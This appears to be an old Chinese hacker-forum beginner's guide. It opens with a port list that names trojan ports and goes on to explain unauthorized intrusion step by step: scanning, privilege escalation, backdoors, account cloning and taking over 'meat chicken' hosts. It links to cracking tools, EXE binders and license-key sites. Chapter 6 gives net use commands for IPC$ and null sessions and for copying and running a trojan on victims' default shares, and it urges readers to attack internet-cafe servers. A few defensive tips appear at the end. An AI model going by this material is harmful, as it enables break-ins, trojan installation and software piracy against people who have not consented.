  391=SynOpticsSNMPRelayPort

  392=SynOpticsPortBrokerPort

  393=DataInterpretationSystem

  394=EMBLNucleicDataTransfer

  395=NETscoutControlProtocol

  396=NovellNetwareoverIP

  397=MultiProtocolTrans.Net.

  398=Kryptolankryptolan

  399=Unassigned#

  400=WorkstationSolutions

  401=UninterruptiblePowerSupply

  402=GenieProtocol

  403=decapdecap

  404=ncednced

  405=ncldncld

  406=InteractiveMailSupportProtocol

  407=Timbuktutimbuktu

  408=ProsperoResourceManagerSys.Man.

  409=ProsperoResourceManagerNodeMan.

  410=DECLadebugRemoteDebugProtocol

  411=RemoteMTProtocol

  412=TrapConventionPort

  413=SMSPsmsp

  414=InfoSeekinfoseek

  415=BNetbnet

  416=Silverplattersilverplatter

  417=Onmuxonmux

  418=Hyper-Ghyper-g

  419=Arielariel1

  420=SMPTEsmpte

  421=Arielariel2

  422=Arielariel3

  423=IBMOperationsPlanningandControlStart

  424=IBMOperationsPlanningandControlTrack

  425=ICADicad-el

  426=smartsdpsmartsdp

  427=ServerLocation

  429=OCS_AMU

  430=UTMPSDutmpsd

  431=UTMPCDutmpcd

  432=IASDiasd

  433=NNSPnnsp

  434=MobileIP-Agent

  435=MobilIP-MN

  436=DNA-CMLdna-cml

  437=comscmcomscm

  439=dasp,ThomasObermair

  440=sgcpsgcp

  441=decvms-sysmgtdecvms-sysmgt

  442=cvc_hostdcvc_hostd

  443=https

  444=SimpleNetworkPagingProtocol

  445=Microsoft-DS

  446=DDM-RDBddm-rdb

  447=DDM-RFMddm-dfm

  448=DDM-BYTEddm-byte

  449=ASServerMapper

  450=TServertserver

  512=exec,Remoteprocessexecution

  513=login,remotelogin

  514=cmd,execwithautoauth.

  514=syslog

  515=Printerspooler

  516=Unassigned

  517=talk

  519=unixtime

  520=extendedfilenameserver

  521=Unassigned

  522=Unassigned

  523=Unassigned

  524=Unassigned

  526=newdate

  530=rpccourier

  端口详细说明表(下)

  531=chatconference

  532=readnewsnetnews

  533=foremergencybroadcasts

  539=ApertusTechnologiesLoadDetermination

  540=uucp

  541=uucp-rlogin

  542=Unassigned

  543=klogin

  544=kshell

  545=Unassigned

  546=Unassigned

  547=Unassigned

  548=Unassigned

  549=Unassigned

  550=new-who

  551=Unassigned

  552=Unassigned

  553=Unassigned

  554=Unassigned

  555=dsf

  556=remotefs

  557-559=rmonitor

  560=rmonitord

  561=dmonitor

  562=chcmd

  563=Unassigned

  564=plan9fileservice

  565=whoami

  566-569Unassigned

  570=demonmeter

  571=udemonmeter

  572-599Unassignedipcserver

  600=SunIPCserver

  607=nqs

  606=CrayUnifiedResourceManager

  608=Sender-Initiated/UnsolicitedFileTransfer

  609=npmp-trapnpmp-trap

  610=npmp-localnpmp-local

  611=npmp-guinpmp-gui

  634=ginadginad

  666=DoomIdSoftware

  704=errlogcopy/serverdaemon

  709=EntrustManager

  729=IBMNetViewDM/6000Server/Client

  730=IBMNetViewDM/6000send/tcp

  731=IBMNetViewDM/6000receive/tcp

  741=netGWnetgw

  742=NetworkbasedRev.Cont.Sys.

  744=FlexibleLicenseManager

  747=FujitsuDeviceControl

  748=RussellInfoSciCalendarManager

  749=kerberosadministration

  751=pump

  752=qrh

  754=send

  758=nlogin

  759=con

  760=ns

  762=quotad

  763=cycleserv

  765=webster

  767=phonephonebook

  769=vid

  771=rtip

  772=cycleserv2

  774=acmaint_dbd

  775=acmaint_transd

  780=wpgs

  786=Concertconcert

  800=mdbs_daemon

  996=CentralPointSoftware

  997=maitrd

  999=puprouter

  1023=Reserved

  1024=Reserved

  1025=networkblackjack

  1030=BBNIAD

  1031=BBNIAD

  1032=BBNIAD

  1067=InstallationBootstrapProto.Serv.

  1068=InstallationBootstrapProto.Cli.

  1080=SOCKS

  1083=AnasoftLicenseManager

  1084=AnasoftLicenseManager

  1155=NetworkFileAccess

  1222=SNIR&Dnetwork

  1248=hermes

  1346=AltaAnalyticsLicenseManager

  1347=multimediaconferencing

  1347=multimediaconferencing

  1348=multimediaconferencing

  1349=RegistrationNetworkProtocol

  1350=RegistrationNetworkProtocol

  1351=DigitalToolWorks(MIT)

  1352=/LotusNotelotusnote

  1353=ReliefConsulting

  1354=RightBrainSoftware

  1355=IntuitiveEdge

  1356=CuillaMartinCompany

  1357=ElectronicPegBoard

  1358=CONNLCLIconnlcli

  1359=FTSRVftsrv

  1360=MIMERmimer

  1361=LinX

  1362=TimeFliestimeflies

  1363=NetworkDataMoverRequester

  1364=NetworkDataMoverServer

  1365=NetworkSoftwareAssociates

  1366=NovellNetWareCommServicePlatform

  1367=DCSdcs

  1368=ScreenCastscreencast

  1369=GlobalViewtoUnixShell

  1370=UnixShelltoGlobalView

  1371=FujitsuConfigProtocol

  1372=FujitsuConfigProtocol

  1373=Chromagrafxchromagrafx

  1374=EPISoftwareSystems

  1375=Bytexbytex

  1376=IBMPersontoPersonSoftware

  1377=CichlidLicenseManager

  1378=ElanLicenseManager

  1379=IntegritySolutions

  1380=TelesisNetworkLicenseManager

  1381=AppleNetworkLicenseManager

  1382=udt_os

  1383=GWHannawayNetworkLicenseManager

  1384=ObjectiveSolutionsLicenseManager

  1385=AtexPublishingLicenseManager

  1386=CheckSumLicenseManager

  1387=ComputerAidedDesignSoftwareIncLM

  1388=ObjectiveSolutionsDataBaseCache

  1389=documentManager

  1390=StorageController

  1391=StorageAccessServer

  1392=PrintManagericlpv-pm

  1393=NetworkLogServer

  1394=NetworkLogClient

  1395=PCWorkstationManagersoftware

  1396=DVLActiveMail

  1397=AudioActiveMail

  1398=VideoActiveMail

  1399=CadkeyLicenseManager

  1400=CadkeyTabletDaemon

  1401=GoldleafLicenseManager

  1402=ProsperoResourceManager

  1403=ProsperoResourceManager

  1404=InfiniteGraphicsLicenseManager

  1405=IBMRemoteExecutionStarter

  1406=NetLabsLicenseManager

  1407=DBSALicenseManager

  1408=SophiaLicenseManager

  1409=HereLicenseManager

  1410=HiQLicenseManager

  1411=AudioFileaf

  1412=InnoSysinnosys

  1413=Innosys-ACLinnosys-acl

  1414=IBMMQSeriesibm-mqseries

  1415=DBStardbstar

  1416=NovellLU6.2novell-lu6.2

  1417=TimbuktuService1Port

  1417=TimbuktuService1Port

  1418=TimbuktuService2Port

  1419=TimbuktuService3Port

  1420=TimbuktuService4Port

  1421=GandalfLicenseManager

  1422=AutodeskLicenseManager

  1423=EssbaseArborSoftware

  1424=HybridEncryptionProtocol

  1425=ZionSoftwareLicenseManager

  1426=Satellite-dataAcquisitionSystem1

  1427=mloaddmonitoringtool

  1428=InformatikLicenseManager

  1429=HypercomNMSnms

  1430=HypercomTPDUtpdu

  1431=ReverseGosipTransport

  1432=BlueberrySoftwareLicenseManager

  1433=Microsoft-SQL-Server

  1434=Microsoft-SQL-Monitor

  1435=IBMCISCibm-cics

  1436=Satellite-dataAcquisitionSystem2

  1437=Tabulatabula

  1438=EiconSecurityAgent/Server

  1439=EiconX25/SNAGateway

  1440=EiconServiceLocationProtocol

  1441=CadisLicenseManagement

  1442=CadisLicenseManagement

  1443=IntegratedEngineeringSoftware

  1444=MarcamLicenseManagement

  1445=ProximaLicenseManager

  1446=OpticalResearchAssociatesLicenseManager

  1447=AppliedParallelResearchLM

  1448=OpenConnectLicenseManager

  1449=PEportpeport

  1450=TandemDistributedWorkbenchFacility

  1451=IBMInformationManagement

  1452=GTEGovernmentSystemsLicenseMan

  1453=GenieLicenseManager

  1454=interHDLLicenseManager

  1454=interHDLLicenseManager

  1455=ESLLicenseManager

  1456=DCAdca

  1457=ValisysLicenseManager

  1458=NicholsResearchCorp.

  1459=ProshareNotebookApplication

  1460=ProshareNotebookApplication

  1461=IBMWirelessLAN

  1462=WorldLicenseManager

  1463=Nucleusnucleus

  1464=MSLLicenseManager

  1465=PipesPlatform

  1466=OceanSoftwareLicenseManager

  1467=CSDMBASEcsdmbase

  1468=CSDMcsdm

  1469=ActiveAnalysisLimitedLicenseManager

  1470=UniversalAnalytics

  1471=csdmbasecsdmbase

  1472=csdmcsdm

  1473=OpenMathopenmath

  1474=Telefindertelefinder

  1475=TaligentLicenseManager

  1476=clvm-cfgclvm-cfg

  1477=ms-sna-server

  1478=ms-sna-base

  1479=dberegisterdberegister

  1480=PacerForumpacerforum

  1481=AIRSairs

  1482=MiteksysLicenseManager

  1483=AFSLicenseManager

  1484=ConfluentLicenseManager

  1485=LANSourcelansource

  1486=nms_topo_serv

  1487=LocalInfoSrvr

  1488=DocStordocstor

  1489=dmdocbrokerdmdocbroker

  1490=insitu-confinsitu-conf

  1491=anynetgateway

  1492=stone-design-1

  1493=netmap_lmnetmap_lm

  1494=icaica

  1495=cvccvc

  1496=liberty-lmliberty-lm

  1497=rfx-lmrfx-lm

  1498=Watcom-SQLwatcom-sql

  1499=FedericoHeinzConsultora

  1500=VLSILicenseManager

  1501=Satellite-dataAcquisitionSystem3

  1502=Shivashivadiscovery

  1503=Databeamimtc-mcs

  1504=EvbsoftwareEngineeringLicenseManager

  1505=FunkSoftware,Inc.

  1524=ingres

  1525=oracle

  1525=ProsperoDirectoryServicenon-priv

  1526=ProsperoDataAccessProtnon-priv

  1527=oracletlisrv

  1529=oraclecoauthor

  1600=issd

  1651=proshareconfaudio

  1652=proshareconfvideo

  1653=proshareconfdata

  1654=proshareconfrequest

  1655=proshareconfnotify

  1661=netview-aix-1netview-aix-1

  1662=netview-aix-2netview-aix-2

  1663=netview-aix-3netview-aix-3

  1664=netview-aix-4netview-aix-4

  1665=netview-aix-5netview-aix-5

  1666=netview-aix-6netview-aix-6

  1986=ciscolicensemanagement

  1987=ciscoRSRBPriority1port

  1988=ciscoRSRBPriority2port

  1989=ciscoRSRBPriority3port

  1989=MHSnetsystemmshnet

  1990=ciscoSTUNPriority1port

  1991=ciscoSTUNPriority2port

  1992=ciscoSTUNPriority3port

  1992=IPsendmsgipsendmsg

  1993=ciscoSNMPTCPport

  1994=ciscoserialtunnelport

  1995=ciscoperfport

  1996=ciscoRemoteSRBport

  1997=ciscoGatewayDiscoveryProtocol

  1998=ciscoX.25service(XOT)

  1999=ciscoidentificationport

  2009=whosockami

  2010=pipe_server

  2011=raid

  2012=raid-ac

  2013=rad-am

  2015=raid-cs

  2016=bootserver

  2017=terminaldb

  2018=rellpack

  2019=about

  2019=xinupageserver

  2020=xinupageserver

  2021=xinuexpansion1

  2021=down

  2022=xinuexpansion2

  2023=xinuexpansion3

  2023=xinuexpansion4

  2024=xinuexpansion4

  2025=xribs

  2026=scrabble

  2027=shadowserver

  2028=submitserver

  2039=device2

  2032=blackboard

  2033=glogger

  2034=scoremgr

  2035=imsldoc

  2038=objectmanager

  2040=lam

  2041=interbase

  2042=isis

  2043=isis-bcast

  2044=primsl

  2045=cdfunc

  2047=dls

  2048=dls-monitor

  2065=DataLintchReadPortNumber

  2067=DataLintchWritePortNumber

  2201=AdvancedTrainingSystemProgram

  2500=ResourceTrackingsystemserver

  2501=ResourceTrackingsystemclient

  2564=HP3000NS/VTblockmodetelnet

  2784=worldwideweb-development

  3049=ccmail

  3264=ccmail,cc:mail/lotus

  3333=dec-notes

  3984=MAPPERnetworknodemanager

  3985=MAPPERTCP/IPserver

  3986=MAPPERworkstationserver

  3421=BullAppriseportmapper

  3900=UnidataUDTOS

  4132=NUTSDaemonnuts_dem

  4133=NUTSBootpServer

  4343=UNICALL

  4444=KRB524

  4672=remotefileaccessserver

  5002=radiofreeethernet

  5010=TelepathStarttelelpathstart

  5011=TelepathAttack

  5050=multimediaconferencecontroltool

  5145=rmonitor_secure

  5190=aol,America-Online

  5300=HAclusterheartbeat

  5301=hacl-gs#HAclustergeneralservices

  5302=HAclusterconfiguration

  5303=hacl-probeHAclusterprobing

  5305=hacl-test

  6000-6063=x11XWindowSystem

  6111=sub-processHPSoftBenchSub-ProcessControl

  6141/=meta-corpMetaCorporationLicenseManager

  6142=aspentec-lmAspenTechnologyLicenseManager

  6143=watershed-lmWatershedLicenseManager

  6144=statsci1-lmStatSciLicenseManager-1

  6145=statsci2-lmStatSciLicenseManager-2

  6146=lonewolf-lmLoneWolfSystemsLicenseManager

  6147=montage-lmMontageLicenseManager

  7000=afs3-fileserverfileserveritself

  7001=afs3-callbackcallbackstocachemanagers

  7002=afs3-prserverusers&groupsdatabase

  7003=afs3-vlservervolumelocationdatabase

  7004=afs3-kaserverAFS/Kerberosauthenticationservice

  7005=afs3-volservolumemanagmentserver

  7006=afs3-errorserrorinterpretationservice

  7007=afs3-bosbasicoverseerprocess

  7008=afs3-updateserver-to-serverupdater

  7009=afs3-rmtsysremotecachemanagerservice

  7010=ups-onlineonlinetuninterruptablepowersupplies

  7100=XFontService

  7200=FODMSFLIP

  7626=冰河

  8010=Wingate

  8181=IMail

  9535=man

  45576=E代时光专业代理端口

  

  org菜鸟进阶(1)

  常用类软件:

  黑白屋:http://www.play8.net/

  华军软件http://www.newhua.com/(根据物理位置自行选择速度快的镜像)

  中国下载http://download.com.cn/(使用查找功能可找到大部份软件)

  东丽在线http://www.tjdl.net/softdown/(不错的软件下载站,类似华军)

  世纪下载http://www.21sx.com/(也是一个不错的下载站)

  安全类软件:

  黑白屋:http://www.play8.net/index2.htm

  安全焦点http://www.xfocus.net/tool.php

  安全资讯http://www.aurorasafe.com/list.asp

  天天安全http://www.ttian.net/download/list.php

  网嗅下载http://netsill.com/download/default.asp

  灰色轨迹http://www.sandflee.net/down/list.asp

  鹰派下载http://211.155.27.112/~technic/down/

  (一些大型精典安全软件下载,不过有时候就上不去)

  校园黑客联盟http://www.schoolhacker.com

  (这两天要推出软件下载专栏,即将有一套崭新的下载程序,大家尽请关注!!)

  找代理在这里:

  代理使用方法http://extend.hk.hi.cn/~sunbird/freeproxy_why.html

  (各种代理使用方法介绍)

  代理服务器地址http://www.salala.com/proxy_index.htm

  (每日更新的,大部份是HTTP代理)

  代理服务器地址http://www.emaga.net/8341/myann

  (每日更新的,大部份是SOCKS代理,既QQ代理)

  注册码在这里:

  第六空间http://www.sixthroom.com/down/qt/ser.rar(注册码大全下载)

  注册码搜索http://www.netpaste.com/code/

  孤月注册码http://www.guyue.com/key/

  菜鸟进阶(2)

  关于被入侵

  简单说明:

  经常有帖子说:“我中木马啦,怎么办?”、“我被攻击了”,“我的windows有问题,是不是被入侵啦?”等等。哪么如果你怀疑系统被入侵的话,请你首先看看日志的记录或是有什么变化,然后你应该查看可疑进程(win98需要用相关工具)、注册表启动项、服务、开放端口等,然后更新病毒库,杀毒。前提是你要有一定的电脑常识并对你的系统比较了解,才能分别正常与否。如果你自己对电脑一窍不通,那在论坛别人也很难帮助你。其实就像对付现实中的病毒一样,应该预防为主。杀毒软件和网络防火墙可以抵御绝大部分危险,自身安全知识的提高则是最根本的保障。最新的病毒相关知识可以到杀毒软件公司的主页上找。另外,系统不正常也可能是操作失误引起的。这里不是“电脑零起点”,所以关于系统修复的问题,请不要在论坛提了。

  相关工具:

  Active Ports 监视自己电脑的端口,并做出相应处理。http://www.sixthroom.com/down/aq/cn_aports.rar

  windows优化大师5.1 它的进程管理功能不错。更是目前最好的系统优化软件。http://www.sixthroom.com/down/aq/wom.rar

  Windows 基准安全分析器 1.0 (特别推荐,详细资料看下载说明吧)

  http://www.sixthroom.com/down/admin/aq/mbsasetup.msi

  Fport-2.0 查看端口关联的进程 (应用于9x/me)http://www.sixthroom.com/down/admin/aq/fport.zip

  mport 比fport更胜一筹的工具http://www.sixthroom.com/down/admin/aq/mport.zip

  KV3000江民杀毒王(正式版+钥匙盘)

  http://www.kxweb.net/down/down.aspdownid=1&id=14

  金山毒霸2003正式版

  http://www.kxweb.net/down/down.aspdownid=1&id=11

  相关资料:

  黑白屋文档中心:http://www.play8.net/cgi-bin/news/article/list.cgi

  104种木马的清除方法http://asp2.6to23.com/ebug88/net/article/net004.htm

  清除恶意网页的破坏http://assistant.3721.com/safe.htm

  2000系统进程总列表http://sinbad.zhoubin.com/read.htmlboard=Win&num=73

  木马的检测、清除及其预防 天网安全检测http://sky.net.cn/main/view.phpcid=170

  蓝盾安全检测http://www.bluedon.com/bluedonserver.asp

  校园黑客联盟http://www.schoolhacker.com

  

  菜鸟进阶(3)

  基础知识和入侵步骤

  简单说明:

  电脑和网络知识可算是做黑客的基础的基础,至少你要先了解了它们再来看下面的文章。看完这部分的文章,你也只是算站到了门口,路还长着呢。这里我再多说几句关于入侵步骤的话,给新手做个引导。所谓入侵,可以理解为未授权的访问。既然是未授权的,就需要借助一些非常规的手段,即通常所说的利用漏洞。

  基础知识网址:

  http://tech.163.com/tm/010213/010213_14563.html

  http://tech.163.com/tm/010213/010213_14564.html

  http://tech.163.com/tm/010214/010214_14632.html

  http://tech.163.com/tm/010214/010214_14634.html

  http://tech.163.com/tm/010214/010214_14638.html

  一、要利用漏洞首先要发现它。端口扫描和漏洞扫描就是“敲门砖”。可以对大量目标做一般扫描,也可以对单一目标做重点扫描。或者两者结合。当你对漏洞熟悉时,你可以只通过端口扫描就能了解目标的可能有的漏洞。这样既提高效率又不易被记录日志。

  几种扫描器的简单使用教程:http://www.chinesehack.org/file/show.aspid=5614

  入侵技术介绍--目标探测:http://www.sixthroom.com/ailan/f... 2&RootID=279&ID=279

  二、找到漏洞后的利用问题,是千差万别的。这正是新手学要学习的地方之一。很多要依@@自己的知识积累及对系统的掌握及熟悉程度,这里就不多说了。下面提供几个提供漏洞资料的网站供大家参考。

  天极网http://www.myhard.com/76284138209935360/index.shtml

  绿盟科技http://www.nsfocus.net/index.phpact=sec_bug

  五月安全网http://bgbbs.www70.cn4e.com/article.aspcat_id=2

  中国信息安全http://www.chinafirst.org.cn/ruodian/advisory.php

  三、利用漏洞的目的是什么呢?是控制对方,即是获得远程shell。shell这个概念是从UNIX下继承过来的,是指与操作系统核心的一种交互方式和界面。典型的例子是telnet。得到shell的办法有很多种,比如通过系统自带的telnet,终端服务。或者用木马和工具提供的,如winshell,冰河等等。以下介绍两篇SHELL编程的文章给大家。

  中国软件http://www.csdn.net/develop/article/14/14219.shtm

  程序春秋http://www.cbinews.com/developer/showconte...articleid=2193

  四、shell是有权限差别的。最高权限--管理员权限才是我们的目标。所以有时会有提升权限的问题。当然,这也是利用了漏洞。以下介绍几篇文章。

  Win2K 提升权限漏洞

  http://www.yesky.com/20010530/182273.shtml

  Microsoft SQL Server Webtasks权限提升漏洞

  http://it.rising.com.cn/newSite/... 10/31-153502052.htm

  Linux kernel ptrace提升权限漏洞

  http://levinstorm.myetang.com/main/holes/unix/005.html

  NT/2000提升权限的方法小结

  http://home.lufeng.net/wolf/Computer/luodong/2000tisheng.htm

  IIS提升权限漏洞

  http://www.ddhome.net/hole/14.htm

  五、有了shell还要扩大它,就是进一步获得更好用的shell。命令行的到图形的、功能少的到多的。于是才有了“怎么开3389”,“怎么上传”之类问题。在这介绍给大家介绍一下现在最流行的3389吧。更多的文章请www.sixthroom.com。

  远程开启3389终端服务

  http://www.sandflee.net/wawa/3389-1.htm

  建立你的3389肉鸡

  http://www.sandflee.net/wawa/sz-3389.htm

  六、为了下次还能控制目标,你需要保持shell。做一个好的后门又是一种“学问”。克隆帐号、埋木马、破administrator的密码,手段不一而足。各位慢慢学吧。

  永远的后门http://www.ttian.net/article/show.phpid=259

  Win2000 下Ping 后门的简单实现

  http://www.landun.org/wenzhang/images/xiao...rticle/154.html

  帐号克隆

  http://www.netXeyes.org/CA.exe

  帐号检查

  http://www.netXeyes.org/CCA.exe

  暴力破解LC4

  http://www.andyxu.net/banana/tools_2/lc4.rar

  端口知识介绍:

  相关工具:

  扫描端口是扫描器的基本功能,工具太多了。提供两个给大家,更多的参看后面。

  X-Port.zip下载http://www.xfocus.net/download.phpid=327

  PortReady下载http://dotpot.533.net/dpsoft/PortReady1.6.zip

  相关资料:

  端口扫描简介http://www.netscreen.com.cn/suml/zhishiyy/.https://blog.csdn.net/newbie_xymt/article/duankougj.htm0

  系统服务及木马默认端口表

  http://www.pttc.yn.cninfo.net/dtsy/nettech...an/41250634.htm

  端口大全http://www.sixthroom.com/ailan/f... 2&RootID=268&ID=268

  常用默认端口列表及功能中文注解http://www.sixthroom.com/ailan/f... 2&RootID=267&ID=267

  常见端口详解及部分攻击策略http://www.sixthroom.com/ailan/f... 2&RootID=266&ID=266

  相关资料:

  如何成为一名黑客http://263.aka.org.cn/Docs/hacker-howto_2001.html

  提问的技巧http://bbs.online.sh.cn/eliteart... 44fb3b6efa4377e48ae

  TCP/IP基础http://www.linkwan.com/gb/routertech/netbase/tcpip.htm

  网络攻防教程http://www.netsill.com/wenzhang/list.aspid=115

  网络入侵步骤及思路http://www.iamguo.com/bh3/hackguide2.htm

  拒绝背后黑手的窥探 IPC$漏洞大揭秘

  http://computer.szptt.net.cn/2002-04-27/nw...042700109.shtml

  全球ip分配表http://519519.vicp.net/lb5000//usr/3/3_11.txt

  黑客入门教程http://www.pttc.yn.cninfo.net/dtsy/nettech...an/43934529.htm

  菜鸟XXX客快速入门

  http://netsafe.ayinfo.ha.cn/sqxw/2002117172333.htm

  几种流行的入侵工具与讲解

  http://www.pttc.yn.cninfo.net/dtsy/nettech...an/44188520.htm

  常见端口详解及部分攻击策略

  http://www.pttc.yn.cninfo.net/dtsy/nettech...quan/-90637.htm

  攻击的各种级别

  http://www.pttc.yn.cninfo.net/dtsy/nettech...an/39825935.htm

  

  菜鸟进阶(4)

  关于命令的使用

  简单说明:

  windowsNT/2000下有丰富的cmd可供使用,其作用也是巨大的。完全值得去熟练掌握她它们。windows2000本身就提供了详细的命令帮助。在开始菜单--》帮助中可以搜索到“windows 2000 命令参考”。强烈建议各位新手花些时间仔细看一遍。装了比如IIS等软件,就会有新的命令(iisreset),在命令行方式下加/或-h参数可以查看帮助,其他内置的命令当然也可以。还有就是掌握一些常用的DOS命令也是非常有必要的。因为WINSOWS不管发展到哪一天,它也都不可能取代DOS,至少现在还不行。NET命令更是最常用的网络命令,想做一个黑客,更是你所必需掌握的。掌握一些LINUX命令也是很有必要的。希望下面的资料对大家有所帮助。

  相关帖子:

  DOS下常用网络相关命令解释

  http://www.jiejingwang.com/list.aspid=521

  入门网络命令

  http://www.jiejingwang.com/list.aspid=520

  Win2000命令全集http://www.sixthroom.com/ailan/f... 2&RootID=343&ID=343

  Windows XP下cmd命令详解http://www.sixthroom.com/ailan/f... 2&RootID=366&ID=366

  ftp命令:http://www.hotcy.org/chem/campous/article/ftp.htm

  telnet命令简介:http://www22.brinkster.com/lastknife/netbase/telnetorder.htm(以上地址简单介绍了TELNET命令,http://www.sixthroom.com/ailan/f... 2&RootID=277&ID=277

  net命令基本用法:http://www.yy0730.com/1/1/1/wen/list.aspid=12

  tftp命令: 由于TFTP命令过于简单,请自行使用“TFTP /?”进行查询。下面在给出一个参照的

  实例:http://levinstorm.myetang.com/main/tutorials/hacking/006.html

  一般入侵所需要的几个常用命令:

  http://www.yixindz.com/badschool/hacker/hack_commands.htm

  Linux 的常用网络命令

  http://www.jiejingwang.com/list.aspid=522

  菜鸟进阶(5)

  关于windows98

  简单说明:

  这类问题有两种:一是怎样入侵win98系统,二是在win98怎样入侵。

  由于98的网络功能并不完善,使得问题的解决远没有像对2000那样“丰富多采”。98默认没有什么网络服务启动,众所周知漏洞是由于各种服务的功能设计并不完美,所以才产生的,也就是说没有漏洞也就很难入侵,找不到什么可利用的漏洞。这给入侵带来的困难是难以想像的.共享入侵,算是最常见的攻击方式了。

  相关资料:

  共享入侵http://www.sixthroom.com/ailan/f... 2&RootID=269&ID=269

  入侵windows98系统http://www.sixthroom.com/ailan/f... 2&RootID=270&ID=270

  win98入侵网吧详解http://www.sixthroom.com/ailan/f... 2&RootID=271&ID=271

  其实还有些方法,比如嗅探密码、发病毒和木马到信箱、甚至用QQ“联络感情”再传个绑木马的Flash等,没什么意思,就此打住(这是前辈说的,他老人家都说打住了,哪我也打住,其实是我也不知道说什么,呵呵)。

  基于同样的理由,98不是一个好的攻击平台。如果只是端口扫描,那么superscan可以胜任。web类的漏洞扫描x-scan也可以。但涉及ipc$的弱口令、漏洞、远程控制工具以及连接一些服务(如sql)就要“基于NT技术构建”的os了。好在3389终端服务的客户端可以是98,所以先搞一台开 3389的肉鸡就算是回避了问题。如果你还在用98,诚恳的建议你:请用2000。如果你在网吧,先试试入侵网吧服务器。(在这里我也要加一句就是如果你是用98系统的话,哪么选择榕哥的流光98版也是不错的。不过有很多功能也还是无法使用)。

  鉴于98的问题技术含量不高、没有深入探讨价值,所以就谈到这里吧。(个人观点)

  相关工具:

  NetPass 1.0 破解98共享密码http://lovezxd.myetang.com/indexpage/indextool/NetPass.zip

  cain v2.5 综合破解工具http://www.qq888.com/down/download.aspDid=968

  exeBinderZ 1.3 EXE捆绑机http://www.heibai.net/download/show.phpid=3028&down=3

  SUPERSCAN3.0中文版下载http://download.pchome.net/php/d... erscanv30.exe&svr=3

  X-SCAN2.3下载http://www.xfocus.net/download.phpid=366

  流光98下载http://www.netxeyes.com/cfluxay2k1for98set...妥约喝フ野桑/a>

  终端服务客户端http://arm.533.net/hack/winterminal.zip(既3389连接器)

  第6章------关于ipc$、空连接和默认共享

  简单说明:

  ****** 首先需要指出的是空连接和ipc$是不同的概念。空连接是在没有信任的情况下与服务器建立的会话,换句话说,它是一个到服务器的匿名访问。ipc$是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限。有许多的工具必须用到ipc$。默认共享是为了方便远程管理而开放的共享,包含了所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。******个人认为这段很重要,因为很多人根本就不知道什么是空连接什么是IPC$.建议不知道的朋友仔细看一下吧.这种问题,不应该不知道的.

  相关帖子:

  拒绝背后黑手的窥探 IPC$漏洞大揭秘

  http://www.sixthroom.com/ailan/f... 2&RootID=281&ID=281

  IPC入侵全攻略http://www.sixthroom.com/ailan/f... 2&RootID=278&ID=278

  win2k中C驱等的默认共享是怎么回事

  http://www.sixthroom.com/ailan/f... 2&RootID=282&ID=282

  取消默认共享≠安全http://js00.TT86绿色上网!/23/wudi/show.... p;id=20021017212524

  常见问题和回答:

  一、怎样建立空连接,它有什么用?

  答:使用命令 net use \IPipc$ "" /user:"" 就可以简单地和目标建立一个空连接(需要目标开放ipc$)。

  对于NT,在默认安全设置下,借助空连接可以列举目标用户、共享,访问everyone权限的共享,访问小部分注册表等,没有什么利用价值。对2000作用就更小了。而且实现也不方便,需借助工具。如果你不理解“没用”的东西为什么还会存在,就看看“专业”的解释吧:

  在NT/2000下的空连接http://www.sixthroom.com/ailan/f... 2&RootID=280&ID=280

  解剖WIN2K下的空会话http://www.sixthroom.com/ailan/f... 2&RootID=283&ID=283

  二、为什么我连不上IPC$?

  答:1,只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功能的。

  2、确认你的命令没有打错。正确的命令是: net use \目标IPipc$ "密码" /user:"用户名"

  注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省略。空密码用""表示。

  3,根据返回的错误号分析原因:

  错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;

  错误号51,Windows 无法找到网络路径 : 网络有问题;

  错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);

  错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;

  错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。

  错误号1326,未知的用户名或错误密码 : 原因很明显了;

  错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动。(连接域控会出现此情况)

  错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。

  4,关于ipc$连不上的问题比较复杂,本论坛没有总结出一个统一的认识,我在肉鸡上实验有时会得出矛盾的结论,十分棘手。而且知道了问题所在,如果没有用其他办法获得shell,很多问题依然不能解决。问题过于细致后就不适合在本文章里探讨了。各位看着办吧,呵呵。

  三、怎样打开目标的IPC$?

  答:首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马。当然,这shell必须是admin权限的。然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上一问题可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法)。还是不行的话(比如有防火墙,杀不了)建议放弃。

  四、怎样映射和访问默认共享?

  答:使用命令net use z: \目标IPc$ 密码" /user:"用户名" 将对方的c盘映射为自己的z盘,其他盘类推。

  如果已经和目标建立了ipc$,则可以直接用IP加盘符加$访问。比如 copy muma.exe \IPd$pathmuma.exe 。或者再映射也可以,只是不用用户名和密码了:net use y: \IPd$ 。然后 copy muma.exe y:pathmuma.exe 。当路径中包含空格时,须用""将路径全引住。

  五、如何删除映射和ipc$连接?

  答:用命令 net use \IPipc$ /del 删除和一个目标的ipc$连接。

  用命令 net use z: /del 删除映射的z盘,其他盘类推。

  用命令 net use * /del 删除全部。会有提示要求按y确认。

  六、连上ipc$然后我能做什么?

  答:能使用管理员权限的帐号成功和目标连接ipc$,表示你可以和对方系统做深入“交流”了。你可以使用各种命令行方式的工具(比如pstools系列、 Win2000SrvReskit、telnethack等)获得目标信息、管理目标的进程和服务等。如果目标开放了默认共享(没开你就帮他开),你就可以上传木马并运行。也可以用tftp、ftp的办法上传。像dwrcc、VNC、RemoteAdmin等工具(木马)还具有直接控屏的功能。如果是 2000server,还可以考虑开启终端服务方便控制。这里提到的工具的使用,请看自带的说明或相关教程。

  七、怎样防止别人用ips$和默认共享入侵我?

  答:A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。

  1,先把已有的删除

  net share ipc$ /del

  net share admin$ /del

  net share c$ /del

  …………(有几个删几个)

  2,禁止建立空连接

